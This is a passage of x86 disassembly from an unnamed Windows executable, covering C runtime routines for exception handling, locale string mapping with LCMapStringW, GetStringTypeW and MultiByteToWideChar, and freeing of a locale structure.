		jnz	short loc_40C37E
		mov	edx, [ecx]
		cmp	edx, edi
		jz	short loc_40C37E
		cmp	edx, 80000026h
		jz	short loc_40C37E
		mov	edx, [eax]
		and	edx, esi
		cmp	edx, ebx
		jb	short loc_40C37E
		test	byte ptr [eax+20h], 1
		jnz	loc_40C411

loc_40C37E:				; CODE XREF: sub_40C335+27j
					; sub_40C335+2Dj ...
		test	byte ptr [ecx+4], 66h
		jz	short loc_40C3A7
		cmp	dword ptr [eax+4], 0
		jz	loc_40C411
		cmp	[ebp+arg_14], 0
		jnz	short loc_40C411
		push	0FFFFFFFFh
		push	eax
		push	[ebp+arg_C]
		push	[ebp+arg_4]
		call	sub_40B85C
		add	esp, 10h
		jmp	short loc_40C411
; ---------------------------------------------------------------------------

loc_40C3A7:				; CODE XREF: sub_40C335+4Dj
		cmp	dword ptr [eax+0Ch], 0
		jnz	short loc_40C3BF
		mov	edx, [eax]
		and	edx, esi
		cmp	edx, 19930521h
		jb	short loc_40C411
		cmp	dword ptr [eax+1Ch], 0
		jz	short loc_40C411

loc_40C3BF:				; CODE XREF: sub_40C335+76j
		cmp	[ecx], edi
		jnz	short loc_40C3F5
		cmp	dword ptr [ecx+10h], 3
		jb	short loc_40C3F5
		cmp	[ecx+14h], ebx
		jbe	short loc_40C3F5
		mov	edx, [ecx+1Ch]
		mov	edx, [edx+8]
		test	edx, edx
		jz	short loc_40C3F5
		movzx	esi, byte ptr [ebp+arg_1C]
		push	esi
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	eax
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	ecx
		call	edx
		add	esp, 20h
		jmp	short loc_40C414
; ---------------------------------------------------------------------------

loc_40C3F5:				; CODE XREF: sub_40C335+8Cj
					; sub_40C335+92j ...
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_1C]
		push	eax
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	ecx
		call	sub_40BFC7
		add	esp, 20h

loc_40C411:				; CODE XREF: sub_40C335+43j
					; sub_40C335+53j ...
		xor	eax, eax
		inc	eax

loc_40C414:				; CODE XREF: sub_40C335+BEj
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_40C335	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C419	proc near		; CODE XREF: sub_40B6DE:loc_40B712p
					; sub_40B818+22j ...

ms_exc		= CPPEH_RECORD ptr -18h

; FUNCTION CHUNK AT 0040C440 SIZE 00000012 BYTES

		push	8
		push	offset dword_422C90
		call	__SEH_prolog4
		call	sub_40595D
		mov	eax, [eax+78h]
		test	eax, eax
		jz	short loc_40C447
		and	[ebp+ms_exc.disabled], 0
		call	eax
		jmp	short loc_40C440
sub_40C419	endp

; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
; START	OF FUNCTION CHUNK FOR sub_40C419

loc_40C440:				; CODE XREF: sub_40C419+1Ej
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh

loc_40C447:				; CODE XREF: sub_40C419+16j
		call	sub_41077D
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40C419

; =============== S U B	R O U T	I N E =======================================



sub_40C452	proc near		; CODE XREF: sub_40BA74+23p
		call	sub_40595D
		mov	eax, [eax+7Ch]
		test	eax, eax
		jz	short loc_40C460
		call	eax

loc_40C460:				; CODE XREF: sub_40C452+Aj
		jmp	sub_40C419
sub_40C452	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C465	proc near		; CODE XREF: sub_404A26+1Cp
					; sub_404A26:loc_404A87p ...

ms_exc		= CPPEH_RECORD ptr -18h

		push	8
		push	offset dword_422CB0
		call	__SEH_prolog4
		push	off_42876C
		call	sub_405753
		pop	ecx
		test	eax, eax
		jz	short loc_40C497
		and	[ebp+ms_exc.disabled], 0
		call	eax
		jmp	short loc_40C490
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]

loc_40C490:				; CODE XREF: sub_40C465+22j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh

loc_40C497:				; CODE XREF: sub_40C465+1Aj
		jmp	sub_40C419
sub_40C465	endp


; =============== S U B	R O U T	I N E =======================================



sub_40C49C	proc near		; CODE XREF: sub_4080D9+33p
		push	offset sub_40C419
		call	sub_4056E7
		pop	ecx
		mov	off_42876C, eax
		retn
sub_40C49C	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C4B0	proc near		; CODE XREF: sub_404B2E+4Ap
					; sub_40B85C+77p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 4
		push	ebx
		push	ecx
		mov	eax, [ebp+arg_4]
		add	eax, 0Ch
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebp
		push	[ebp+arg_8]
		mov	ecx, [ebp+arg_8]
		mov	ebp, [ebp+var_4]
		call	sub_40F214
		push	esi
		push	edi
		call	eax
		pop	edi
		pop	esi
		mov	ebx, ebp
		pop	ebp
		mov	ecx, [ebp+arg_8]
		push	ebp
		mov	ebp, ebx
		cmp	ecx, 100h
		jnz	short loc_40C4EF
		mov	ecx, 2

loc_40C4EF:				; CODE XREF: sub_40C4B0+38j
		push	ecx
		call	sub_40F214
		pop	ebp
		pop	ecx
		pop	ebx
		leave
		retn	0Ch
sub_40C4B0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40C4FC	proc near		; CODE XREF: sub_40C517+220p
					; sub_40C517+229p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		test	eax, eax
		jz	short locret_40C516
		sub	eax, 8
		cmp	dword ptr [eax], 0DDDDh
		jnz	short locret_40C516
		push	eax
		call	sub_403B91
		pop	ecx

locret_40C516:				; CODE XREF: sub_40C4FC+6j
					; sub_40C4FC+11j
		retn
sub_40C4FC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C517	proc near		; CODE XREF: sub_40C8B9+2Cp

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		xor	ebx, ebx
		cmp	dword_428770, ebx
		push	edi
		mov	esi, ecx
		jnz	short loc_40C56E
		push	ebx
		push	ebx
		xor	edi, edi
		inc	edi
		push	edi
		push	offset dword_41EC5C
		push	100h
		push	ebx
		call	ds:dword_41E128	; LCMapStringW
		test	eax, eax
		jz	short loc_40C559
		mov	dword_428770, edi
		jmp	short loc_40C56E
; ---------------------------------------------------------------------------

loc_40C559:				; CODE XREF: sub_40C517+38j
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 78h
		jnz	short loc_40C56E
		mov	dword_428770, 2

loc_40C56E:				; CODE XREF: sub_40C517+1Dj
					; sub_40C517+40j ...
		cmp	[ebp+arg_C], ebx
		jle	short loc_40C595
		mov	ecx, [ebp+arg_C]
		mov	eax, [ebp+arg_8]

loc_40C579:				; CODE XREF: sub_40C517+6Aj
		dec	ecx
		cmp	[eax], bl
		jz	short loc_40C586
		inc	eax
		cmp	ecx, ebx
		jnz	short loc_40C579
		or	ecx, 0FFFFFFFFh

loc_40C586:				; CODE XREF: sub_40C517+65j
		mov	eax, [ebp+arg_C]
		sub	eax, ecx
		dec	eax
		cmp	eax, [ebp+arg_C]
		jge	short loc_40C592
		inc	eax

loc_40C592:				; CODE XREF: sub_40C517+78j
		mov	[ebp+arg_C], eax

loc_40C595:				; CODE XREF: sub_40C517+5Aj
		mov	eax, dword_428770
		cmp	eax, 2
		jz	loc_40C74E
		cmp	eax, ebx
		jz	loc_40C74E
		cmp	eax, 1
		jnz	loc_40C77F
		cmp	[ebp+arg_18], ebx
		mov	[ebp+var_8], ebx
		jnz	short loc_40C5C4
		mov	eax, [esi]
		mov	eax, [eax+4]
		mov	[ebp+arg_18], eax

loc_40C5C4:				; CODE XREF: sub_40C517+A3j
		mov	esi, ds:dword_41E0A0
		xor	eax, eax
		cmp	[ebp+arg_1C], ebx
		push	ebx
		push	ebx
		push	[ebp+arg_C]
		setnz	al
		push	[ebp+arg_8]
		lea	eax, ds:1[eax*8]
		push	eax
		push	[ebp+arg_18]
		call	esi	; MultiByteToWideChar
		mov	edi, eax
		cmp	edi, ebx
		jz	loc_40C77F
		jle	short loc_40C636
		push	0FFFFFFE0h
		xor	edx, edx
		pop	eax
		div	edi
		cmp	eax, 2
		jb	short loc_40C636
		lea	eax, [edi+edi+8]
		cmp	eax, 400h
		ja	short loc_40C61D
		call	sub_410A70
		mov	eax, esp
		cmp	eax, ebx
		jz	short loc_40C631
		mov	dword ptr [eax], 0CCCCh
		jmp	short loc_40C62E
; ---------------------------------------------------------------------------

loc_40C61D:				; CODE XREF: sub_40C517+F1j
		push	eax
		call	sub_403C6E
		cmp	eax, ebx
		pop	ecx
		jz	short loc_40C631
		mov	dword ptr [eax], 0DDDDh

loc_40C62E:				; CODE XREF: sub_40C517+104j
		add	eax, 8

loc_40C631:				; CODE XREF: sub_40C517+FCj
					; sub_40C517+10Fj
		mov	[ebp+var_C], eax
		jmp	short loc_40C639
; ---------------------------------------------------------------------------

loc_40C636:				; CODE XREF: sub_40C517+DAj
					; sub_40C517+E6j
		mov	[ebp+var_C], ebx

loc_40C639:				; CODE XREF: sub_40C517+11Dj
		cmp	[ebp+var_C], ebx
		jz	loc_40C77F
		push	edi
		push	[ebp+var_C]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	1
		push	[ebp+arg_18]
		call	esi	; MultiByteToWideChar
		test	eax, eax
		jz	loc_40C73D
		mov	esi, ds:dword_41E128
		push	ebx
		push	ebx
		push	edi
		push	[ebp+var_C]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi	; LCMapStringW
		mov	ecx, eax
		cmp	ecx, ebx
		mov	[ebp+var_8], ecx
		jz	loc_40C73D
		test	word ptr [ebp+arg_4], 400h
		jz	short loc_40C6AD
		cmp	[ebp+arg_14], ebx
		jz	loc_40C73D
		cmp	ecx, [ebp+arg_14]
		jg	loc_40C73D
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	edi
		push	[ebp+var_C]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi	; LCMapStringW
		jmp	loc_40C73D
; ---------------------------------------------------------------------------

loc_40C6AD:				; CODE XREF: sub_40C517+16Bj
		cmp	ecx, ebx
		jle	short loc_40C6F6
		push	0FFFFFFE0h
		xor	edx, edx
		pop	eax
		div	ecx
		cmp	eax, 2
		jb	short loc_40C6F6
		lea	eax, [ecx+ecx+8]
		cmp	eax, 400h
		ja	short loc_40C6DE
		call	sub_410A70
		mov	esi, esp
		cmp	esi, ebx
		jz	short loc_40C73D
		mov	dword ptr [esi], 0CCCCh
		add	esi, 8
		jmp	short loc_40C6F8
; ---------------------------------------------------------------------------

loc_40C6DE:				; CODE XREF: sub_40C517+1AFj
		push	eax
		call	sub_403C6E
		cmp	eax, ebx
		pop	ecx
		jz	short loc_40C6F2
		mov	dword ptr [eax], 0DDDDh
		add	eax, 8

loc_40C6F2:				; CODE XREF: sub_40C517+1D0j
		mov	esi, eax
		jmp	short loc_40C6F8
; ---------------------------------------------------------------------------

loc_40C6F6:				; CODE XREF: sub_40C517+198j
					; sub_40C517+1A4j
		xor	esi, esi

loc_40C6F8:				; CODE XREF: sub_40C517+1C5j
					; sub_40C517+1DDj
		cmp	esi, ebx
		jz	short loc_40C73D
		push	[ebp+var_8]
		push	esi
		push	edi
		push	[ebp+var_C]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	ds:dword_41E128	; LCMapStringW
		test	eax, eax
		jz	short loc_40C736
		cmp	[ebp+arg_14], ebx
		push	ebx
		push	ebx
		jnz	short loc_40C71F
		push	ebx
		push	ebx
		jmp	short loc_40C725
; ---------------------------------------------------------------------------

loc_40C71F:				; CODE XREF: sub_40C517+202j
		push	[ebp+arg_14]
		push	[ebp+arg_10]

loc_40C725:				; CODE XREF: sub_40C517+206j
		push	[ebp+var_8]
		push	esi
		push	ebx
		push	[ebp+arg_18]
		call	ds:dword_41E134	; WideCharToMultiByte
		mov	[ebp+var_8], eax

loc_40C736:				; CODE XREF: sub_40C517+1FBj
		push	esi
		call	sub_40C4FC
		pop	ecx

loc_40C73D:				; CODE XREF: sub_40C517+13Ej
					; sub_40C517+15Fj ...
		push	[ebp+var_C]
		call	sub_40C4FC
		mov	eax, [ebp+var_8]
		pop	ecx
		jmp	loc_40C8A7
; ---------------------------------------------------------------------------

loc_40C74E:				; CODE XREF: sub_40C517+86j
					; sub_40C517+8Ej
		cmp	[ebp+arg_0], ebx
		mov	[ebp+var_C], ebx
		mov	[ebp+var_10], ebx
		jnz	short loc_40C761
		mov	eax, [esi]
		mov	eax, [eax+14h]
		mov	[ebp+arg_0], eax

loc_40C761:				; CODE XREF: sub_40C517+240j
		cmp	[ebp+arg_18], ebx
		jnz	short loc_40C76E
		mov	eax, [esi]
		mov	eax, [eax+4]
		mov	[ebp+arg_18], eax

loc_40C76E:				; CODE XREF: sub_40C517+24Dj
		push	[ebp+arg_0]
		call	sub_410870
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		mov	[ebp+var_14], eax
		jnz	short loc_40C786

loc_40C77F:				; CODE XREF: sub_40C517+97j
					; sub_40C517+D4j ...
		xor	eax, eax
		jmp	loc_40C8A7
; ---------------------------------------------------------------------------

loc_40C786:				; CODE XREF: sub_40C517+266j
		cmp	eax, [ebp+arg_18]
		jz	loc_40C86A
		push	ebx
		push	ebx
		lea	ecx, [ebp+arg_C]
		push	ecx
		push	[ebp+arg_8]
		push	eax
		push	[ebp+arg_18]
		call	sub_4108B7
		add	esp, 18h
		cmp	eax, ebx
		mov	[ebp+var_C], eax
		jz	short loc_40C77F
		mov	esi, ds:off_41E12C
		push	ebx
		push	ebx
		push	[ebp+arg_C]
		push	eax
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi ; sub_45A89D
		cmp	eax, ebx
		mov	[ebp+var_8], eax
		jnz	short loc_40C7CD

loc_40C7C6:				; CODE XREF: sub_40C517+2D0j
					; sub_40C517+2F9j
		xor	esi, esi
		jmp	loc_40C884
; ---------------------------------------------------------------------------

loc_40C7CD:				; CODE XREF: sub_40C517+2ADj
		jle	short loc_40C80C
		cmp	eax, 0FFFFFFE0h
		ja	short loc_40C80C
		add	eax, 8
		cmp	eax, 400h
		ja	short loc_40C7F4
		call	sub_410A70
		mov	edi, esp
		cmp	edi, ebx
		jz	short loc_40C7C6
		mov	dword ptr [edi], 0CCCCh
		add	edi, 8
		jmp	short loc_40C80E
; ---------------------------------------------------------------------------

loc_40C7F4:				; CODE XREF: sub_40C517+2C5j
		push	eax
		call	sub_403C6E
		cmp	eax, ebx
		pop	ecx
		jz	short loc_40C808
		mov	dword ptr [eax], 0DDDDh
		add	eax, 8

loc_40C808:				; CODE XREF: sub_40C517+2E6j
		mov	edi, eax
		jmp	short loc_40C80E
; ---------------------------------------------------------------------------

loc_40C80C:				; CODE XREF: sub_40C517:loc_40C7CDj
					; sub_40C517+2BBj
		xor	edi, edi

loc_40C80E:				; CODE XREF: sub_40C517+2DBj
					; sub_40C517+2F3j
		cmp	edi, ebx
		jz	short loc_40C7C6
		push	[ebp+var_8]
		push	ebx
		push	edi
		call	sub_408130
		add	esp, 0Ch
		push	[ebp+var_8]
		push	edi
		push	[ebp+arg_C]
		push	[ebp+var_C]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi ; sub_45A89D
		cmp	eax, ebx
		mov	[ebp+var_8], eax
		jnz	short loc_40C83C
		xor	esi, esi
		jmp	short loc_40C861
; ---------------------------------------------------------------------------

loc_40C83C:				; CODE XREF: sub_40C517+31Fj
		push	[ebp+arg_14]
		lea	eax, [ebp+var_8]
		push	[ebp+arg_10]
		push	eax
		push	edi
		push	[ebp+arg_18]
		push	[ebp+var_14]
		call	sub_4108B7
		mov	esi, eax
		mov	[ebp+var_10], esi
		add	esp, 18h
		neg	esi
		sbb	esi, esi
		and	esi, [ebp+var_8]

loc_40C861:				; CODE XREF: sub_40C517+323j
		push	edi
		call	sub_40C4FC
		pop	ecx
		jmp	short loc_40C884
; ---------------------------------------------------------------------------

loc_40C86A:				; CODE XREF: sub_40C517+272j
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	ds:off_41E12C
		mov	esi, eax

loc_40C884:				; CODE XREF: sub_40C517+2B1j
					; sub_40C517+351j
		cmp	[ebp+var_C], ebx
		jz	short loc_40C892
		push	[ebp+var_C]
		call	sub_403B91
		pop	ecx

loc_40C892:				; CODE XREF: sub_40C517+370j
		mov	eax, [ebp+var_10]
		cmp	eax, ebx
		jz	short loc_40C8A5
		cmp	[ebp+arg_10], eax
		jz	short loc_40C8A5
		push	eax
		call	sub_403B91
		pop	ecx

loc_40C8A5:				; CODE XREF: sub_40C517+380j
					; sub_40C517+385j
		mov	eax, esi

loc_40C8A7:				; CODE XREF: sub_40C517+232j
					; sub_40C517+26Aj
		lea	esp, [ebp-20h]
		pop	edi
		pop	esi
		pop	ebx
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		call	sub_402C9E
		leave
		retn
sub_40C517	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C8B9	proc near		; CODE XREF: sub_404DD6+B6p
					; sub_404DD6+DBp ...

var_10		= byte ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h
arg_20		= dword	ptr  28h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_0]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		push	[ebp+arg_20]
		lea	ecx, [ebp+var_10]
		push	[ebp+arg_1C]
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		call	sub_40C517
		add	esp, 20h
		cmp	[ebp+var_4], 0
		jz	short locret_40C8FA
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40C8FA:				; CODE XREF: sub_40C8B9+38j
		leave
		retn
sub_40C8B9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C8FC	proc near		; CODE XREF: sub_40CAB4+29p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, dword_428774
		push	ebx
		push	esi
		xor	ebx, ebx
		cmp	eax, ebx
		push	edi
		mov	edi, ecx
		jnz	short loc_40C955
		lea	eax, [ebp+var_8]
		push	eax
		xor	esi, esi
		inc	esi
		push	esi
		push	offset dword_41EC5C
		push	esi
		call	ds:dword_41E120	; GetStringTypeW
		test	eax, eax
		jz	short loc_40C93B
		mov	dword_428774, esi
		jmp	short loc_40C96F
; ---------------------------------------------------------------------------

loc_40C93B:				; CODE XREF: sub_40C8FC+35j
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 78h
		jnz	short loc_40C950
		push	2
		pop	eax
		mov	dword_428774, eax
		jmp	short loc_40C955
; ---------------------------------------------------------------------------

loc_40C950:				; CODE XREF: sub_40C8FC+48j
		mov	eax, dword_428774

loc_40C955:				; CODE XREF: sub_40C8FC+1Dj
					; sub_40C8FC+52j
		cmp	eax, 2
		jz	loc_40CA2D
		cmp	eax, ebx
		jz	loc_40CA2D
		cmp	eax, 1
		jnz	loc_40CA57

loc_40C96F:				; CODE XREF: sub_40C8FC+3Dj
		cmp	[ebp+arg_10], ebx
		mov	[ebp+var_8], ebx
		jnz	short loc_40C97F
		mov	eax, [edi]
		mov	eax, [eax+4]
		mov	[ebp+arg_10], eax

loc_40C97F:				; CODE XREF: sub_40C8FC+79j
		mov	esi, ds:dword_41E0A0
		xor	eax, eax
		cmp	[ebp+arg_18], ebx
		push	ebx
		push	ebx
		push	[ebp+arg_8]
		setnz	al
		push	[ebp+arg_4]
		lea	eax, ds:1[eax*8]
		push	eax
		push	[ebp+arg_10]
		call	esi	; MultiByteToWideChar
		mov	edi, eax
		cmp	edi, ebx
		jz	loc_40CA57
		jle	short loc_40C9EA
		cmp	edi, 7FFFFFF0h
		ja	short loc_40C9EA
		lea	eax, [edi+edi+8]
		cmp	eax, 400h
		ja	short loc_40C9D4
		call	sub_410A70
		mov	eax, esp
		cmp	eax, ebx
		jz	short loc_40C9E8
		mov	dword ptr [eax], 0CCCCh
		jmp	short loc_40C9E5
; ---------------------------------------------------------------------------

loc_40C9D4:				; CODE XREF: sub_40C8FC+C3j
		push	eax
		call	sub_403C6E
		cmp	eax, ebx
		pop	ecx
		jz	short loc_40C9E8
		mov	dword ptr [eax], 0DDDDh

loc_40C9E5:				; CODE XREF: sub_40C8FC+D6j
		add	eax, 8

loc_40C9E8:				; CODE XREF: sub_40C8FC+CEj
					; sub_40C8FC+E1j
		mov	ebx, eax

loc_40C9EA:				; CODE XREF: sub_40C8FC+B0j
					; sub_40C8FC+B8j
		test	ebx, ebx
		jz	short loc_40CA57
		lea	eax, [edi+edi]
		push	eax
		push	0
		push	ebx
		call	sub_408130
		add	esp, 0Ch
		push	edi
		push	ebx
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	1
		push	[ebp+arg_10]
		call	esi	; MultiByteToWideChar
		test	eax, eax
		jz	short loc_40CA21
		push	[ebp+arg_C]
		push	eax
		push	ebx
		push	[ebp+arg_0]
		call	ds:dword_41E120	; GetStringTypeW
		mov	[ebp+var_8], eax

loc_40CA21:				; CODE XREF: sub_40C8FC+112j
		push	ebx
		call	sub_40C4FC
		mov	eax, [ebp+var_8]
		pop	ecx
		jmp	short loc_40CAA2
; ---------------------------------------------------------------------------

loc_40CA2D:				; CODE XREF: sub_40C8FC+5Cj
					; sub_40C8FC+64j
		xor	esi, esi
		cmp	[ebp+arg_14], ebx
		jnz	short loc_40CA3C
		mov	eax, [edi]
		mov	eax, [eax+14h]
		mov	[ebp+arg_14], eax

loc_40CA3C:				; CODE XREF: sub_40C8FC+136j
		cmp	[ebp+arg_10], ebx
		jnz	short loc_40CA49
		mov	eax, [edi]
		mov	eax, [eax+4]
		mov	[ebp+arg_10], eax

loc_40CA49:				; CODE XREF: sub_40C8FC+143j
		push	[ebp+arg_14]
		call	sub_410870
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jnz	short loc_40CA5B

loc_40CA57:				; CODE XREF: sub_40C8FC+6Dj
					; sub_40C8FC+AAj ...
		xor	eax, eax
		jmp	short loc_40CAA2
; ---------------------------------------------------------------------------

loc_40CA5B:				; CODE XREF: sub_40C8FC+159j
		cmp	eax, [ebp+arg_10]
		jz	short loc_40CA7E
		push	ebx
		push	ebx
		lea	ecx, [ebp+arg_8]
		push	ecx
		push	[ebp+arg_4]
		push	eax
		push	[ebp+arg_10]
		call	sub_4108B7
		mov	esi, eax
		add	esp, 18h
		cmp	esi, ebx
		jz	short loc_40CA57
		mov	[ebp+arg_4], esi

loc_40CA7E:				; CODE XREF: sub_40C8FC+162j
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		push	[ebp+arg_14]
		call	ds:off_41E124
		cmp	esi, ebx
		mov	edi, eax
		jz	short loc_40CAA0
		push	esi
		call	sub_403B91
		pop	ecx

loc_40CAA0:				; CODE XREF: sub_40C8FC+19Bj
		mov	eax, edi

loc_40CAA2:				; CODE XREF: sub_40C8FC+12Fj
					; sub_40C8FC+15Dj
		lea	esp, [ebp-14h]
		pop	edi
		pop	esi
		pop	ebx
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		call	sub_402C9E
		leave
		retn
sub_40C8FC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40CAB4	proc near		; CODE XREF: sub_404DD6+96p
					; sub_40D004+83p

var_10		= byte ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_0]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		push	[ebp+arg_1C]
		lea	ecx, [ebp+var_10]
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		call	sub_40C8FC
		add	esp, 1Ch
		cmp	[ebp+var_4], 0
		jz	short locret_40CAF2
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40CAF2:				; CODE XREF: sub_40CAB4+35j
		leave
		retn
sub_40CAB4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CAF4	proc near		; CODE XREF: sub_4053E1+E9p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	loc_40CC82
		push	dword ptr [esi+4]
		call	sub_403B91
		push	dword ptr [esi+8]
		call	sub_403B91
		push	dword ptr [esi+0Ch]
		call	sub_403B91
		push	dword ptr [esi+10h]
		call	sub_403B91
		push	dword ptr [esi+14h]
		call	sub_403B91
		push	dword ptr [esi+18h]
		call	sub_403B91
		push	dword ptr [esi]
		call	sub_403B91
		push	dword ptr [esi+20h]
		call	sub_403B91
		push	dword ptr [esi+24h]
		call	sub_403B91
		push	dword ptr [esi+28h]
		call	sub_403B91
		push	dword ptr [esi+2Ch]
		call	sub_403B91
		push	dword ptr [esi+30h]
		call	sub_403B91
		push	dword ptr [esi+34h]
		call	sub_403B91
		push	dword ptr [esi+1Ch]
		call	sub_403B91
		push	dword ptr [esi+38h]
		call	sub_403B91
		push	dword ptr [esi+3Ch]
		call	sub_403B91
		add	esp, 40h
		push	dword ptr [esi+40h]
		call	sub_403B91
		push	dword ptr [esi+44h]
		call	sub_403B91
		push	dword ptr [esi+48h]
		call	sub_403B91
		push	dword ptr [esi+4Ch]
		call	sub_403B91
		push	dword ptr [esi+50h]
		call	sub_403B91
		push	dword ptr [esi+54h]
		call	sub_403B91
		push	dword ptr [esi+58h]
		call	sub_403B91
		push	dword ptr [esi+5Ch]
		call	sub_403B91
		push	dword ptr [esi+60h]
		call	sub_403B91
		push	dword ptr [esi+64h]
		call	sub_403B91
		push	dword ptr [esi+68h]
		call	sub_403B91
		push	dword ptr [esi+6Ch]
		call	sub_403B91
		push	dword ptr [esi+70h]
		call	sub_403B91
		push	dword ptr [esi+74h]
		call	sub_403B91
		push	dword ptr [esi+78h]
		call	sub_403B91
		push	dword ptr [esi+7Ch]
		call	sub_403B91
		add	esp, 40h
		push	dword ptr [esi+80h]
		call	sub_403B91
		push	dword ptr [esi+84h]
		call	sub_403B91
		push	dword ptr [esi+88h]
		call	sub_403B91
		push	dword ptr [esi+8Ch]
		call	sub_403B91
		push	dword ptr [esi+90h]
		call	sub_403B91
		push	dword ptr [esi+94h]
		call	sub_403B91
		push	dword ptr [esi+98h]
		call	sub_403B91
		push	dword ptr [esi+9Ch]
		call	sub_403B91
		push	dword ptr [esi+0A0h]
		call	sub_403B91
		push	dword ptr [esi+0A4h]
		call	sub_403B91
		push	dword ptr [esi+0A8h]
		call	sub_403B91
		add	esp, 2Ch

loc_40CC82:				; CODE XREF: sub_40CAF4+7j
		pop	esi
		retn
sub_40CAF4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CC84	proc near		; CODE XREF: sub_4053E1+64p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	short loc_40CCC2
		mov	eax, [esi]
		cmp	eax, off_424F38
		jz	short loc_40CC9E
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CC9E:				; CODE XREF: sub_40CC84+11j
		mov	eax, [esi+4]
		cmp	eax, off_424F3C
		jz	short loc_40CCB0
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CCB0:				; CODE XREF: sub_40CC84+23j
		mov	esi, [esi+8]
		cmp	esi, off_424F40
		jz	short loc_40CCC2
		push	esi
		call	sub_403B91
